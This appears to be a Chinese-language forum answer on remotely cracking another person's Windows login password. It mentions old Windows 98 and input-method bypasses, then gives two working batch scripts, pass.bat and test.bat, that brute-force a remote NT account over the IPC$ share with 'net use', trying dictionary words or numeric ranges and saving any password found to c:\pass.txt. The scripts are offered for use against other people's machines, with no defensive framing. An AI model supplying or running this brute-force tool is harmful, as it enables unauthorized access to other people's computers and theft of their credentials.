如何遠程破解他人Windows開機登陸密碼

遠程的話對98(單機的話就不用破了,點取消就可以登錄的)可以比較容易,XP和2000以前還可以利用輸入法漏洞.現在就很困難啦.用dos命令破遠程NT用戶密碼 假如知道壹個NT帳戶與密碼，就可以用　net use \\主機\ipc$ "密碼" /user:"用戶"　與遠程主機建立連接,然後DOS命令得用字典裏的密碼登錄：　1、字典：for /f %i in (字典文件) do net use \\主機\ipc$ "%i" /user:"用戶"　2、數字：for /l %i in (start,step,end) do net use \\主機\ipc$ "%i" /user:"用戶" 這樣只是登錄了,但要想知道密碼的話如下方法:　　將下面文件存為pass.bat:　@echo off　echo --- >>c:\pass.txt　echo - >>c:\pass.txt　date /t >>c:\pass.txt　time /t >>c:\pass.txt　echo 破解結果： >>c:\pass.txt　if "%6"=="1" goto shit2　:shit1　start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3　goto quit　:shit2　start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5　:quit　將下面文件存為test.bat:　net use \\%1\ipc$ %2 /user:"%3"　goto answer%ERRORLEVEL%　rem %ERRORLEVEL%表示取前壹命令執行返回結果，net use成功返回0，失敗返回2　:answer0　echo 遠程主機："%1" >>c:\pass.txt　echo 用 戶："%3" >>c:\pass.txt　echo 密 碼：%2 >>c:\pass.txt　net use \\%1\ipc$ /delet　exit　:answer2　將pass.bat與test.bat存放於system32中，用法如下：　1、如果用字典破：pass.bat 字典文件路徑及名稱 主機 用戶名　2、如果用數字破：pass.bat 起始數 步長 結束數 主機 用戶名 1　密碼出來之後，存放於c:\pass.txt文件裏面。 關於2000和xp的兩篇不錯了文章，建議妳去看看。 /article/2004/1119/A20041119363784.shtml /06/0911/09/2QNSNOS7000917H3.html